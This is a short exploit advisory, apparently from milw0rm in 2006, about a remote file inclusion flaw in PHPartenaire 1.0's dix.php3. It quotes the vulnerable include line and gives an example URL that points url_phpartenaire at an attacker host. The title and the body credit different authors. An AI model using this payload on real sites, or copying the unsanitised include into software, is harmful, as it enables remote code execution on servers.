PHPartenaire 1.0 dix.php3 Remote File Include Vulnerability by h3m4n

VIEWS: 24 PAGES: 1

									                       PHPartenaire 1.0 dix.php3 Remote File Include Vulnerability             Page 1/1
  1    #===================================================================================#
  2    #
  3    # PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit
  4    #
  5    #===================================================================================#
  6    #
  7    # Softname : PHPartenaire
  8    # Url : http://ograweb.free.fr/phpartenaire/
  9    # Exploit type : Remote File Inclusion.
  10   # Critical: Dangerous.
  11   # Solution Status: Unpatched.
  12   #
  13   #===================================================================================#
  14   #
  15   # By DaDIsS − Member of the Moroccan Hackers Team
  16   #
  17   #===================================================================================#
  18   #
  19   # Exploit Explanation :
  20   #
  21   #
  22   # The flaw resides in dix.php3 file that contain this code :
  23   #
  24   # in line 9 :
  25   #
  26   # include($url_phpartenaire."/config.php3");
  27   #
  28   #===================================================================================#
  29   #
  30   # Example :
  31   #
  32   #
  33   # http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
  34   #
  35   #
  36   #================================================================#
  37   #
  38   # Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
  39   #
  40   #===================================================================================#
  41   #
  42   # DaDIsS / dadiss@virtuaplanet.net
  43   # Proud to be a Moroccan !
  44   #
  45   #===================================================================================#
  46
  47   # milw0rm.com [2006−09−21]




DaDIsS                                                                                         09/21/2006

								
To top